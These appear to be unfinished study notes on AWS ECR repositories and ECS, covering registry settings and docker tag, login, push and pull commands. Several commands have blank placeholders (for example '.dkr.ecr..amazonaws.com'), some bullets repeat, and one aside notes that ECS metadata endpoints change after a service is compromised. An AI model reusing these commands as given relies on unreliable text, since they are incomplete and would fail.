# ECR and ECS A **registry** is a storage location for Docker container images in AWS. It is a logical namespace that can contain multiple **repositories.** A **repository** is a collection of related Docker container images within a registry. It stores different versions (tags) of container images. A repository is where one can push, pull, and manage the lifecycle of Docker images. ### Steps for using ECR

* The **URI** is what is used to reference the repository images while creating containers on ECS clusters. Format: \.dkr.ecr.\.amazonaws.com/ \ * The **Tag immutability** column lists its status, if tag immutability is enabled it will prevent image pushes with pre-existing tags from overwriting the images. * The **Encryption type** column lists the encryption properties of the repository, it shows the default encryption types such as AES-256, or has KMS enabled encryption. * The **Pull through cache** column lists its status, if Pull through cache status is Active it will cache repositories in an external public repository into the private repository

* The **Permissions** section allows to apply a registry policy to grant permissions to an AWS principal at the private registry level. These allow us to scope access to the Replication and pull through cache configuration features of private registry. * The **Pull through cache configuration** lets set pull through cache rules for the repository. The Replication configuration lets set rules to manage cross region and cross account repository replication. On the private repositories listing, The **Pull through cache** column lists its status, if Pull through cache status is Active it will cache repositories in an external public repository into the private repository * The **Scanning configuration** has two options: * **Basic scanning** is a free service that allows manual scans and scans on push of images in the registry. * **Enhanced scanning** provides automated continuous scanning that identifies vulnerabilities in both operating systems and enhanced scanning

{% hint style="info" %} The Public tab lists the repositories which are publicly accessible from this account. A unique default alias is added to the repository name at creation, it is used for identification of this repository from the multitude of public repositories on AWS. {% endhint %} To Push Docker Images to ECR * **Tag Docker Image**: ```bash docker tag your-image-name:latest .dkr.ecr..amazonaws.com/your-repository:your-tag ``` * **Login to ECR**: Authenticate Docker to your ECR registry: ```bash aws ecr get-login-password --region | docker login --username AWS --password-stdin .dkr.ecr..amazonaws.com ``` * **Push the Image**: Push the tagged image to ECR: ```bash docker push .dkr.ecr..amazonaws.com/your-repository:your-tag ``` * **Pull the Image**: `docker pull .dkr.ecr..amazonaws.com/your-repository:your-tag` Example:

{% hint style="info" %} Integrate ECR with CI/CD tools (like AWS CodePipeline or Jenkins) to automate the process of building, tagging, and pushing images to ECR whenever changes are made to your codebase. {% endhint %} ```bash //After pulling an image, if one wants to run a docker image docker images <-- this will give iamge ID docker run -it -p : <-- It will run docker exec -it bash ``` * Implement a tagging strategy that includes version numbers and identifiers for easy tracking and updates. When one create new versions of the application, use a consistent tagging strategy (like semantic versioning) to clearly indicate changes (e.g., `v1.0.0`, `v1.1.0`). * After pushing new images, update deployment configurations in ECS or EKS to use the new tags. This is done on the basis of Task Definition as one can create it such that specifies container image with a particular tag. One can use environment variables or parameters to dynamically set the image tag based on requirements. **ECS**, is a logical group of EC2 instances on which you can run an application without having to scale your own cluster management infrastructure because ECS manages that for you. If you manage to compromise service running in **ECS**, the **metadata endpoints change**. <-Will update later, so ignore the below-> Deploy Images Using Tags in ECS or EKS //Give snapshot images below for the steps * When creating or updating an ECS Task Definition or an EKS Deployment, specify the image URI with the tag: * Example: `.dkr.ecr..amazonaws.com/nameof-repository:tag-given`. * For ECS, you can do this in the Task Definition: * Go to **ECS** in the console. * Select **Task Definitions** and either create a new one or edit an existing definition. * Under **Container Definitions**, specify the image URL with the tag.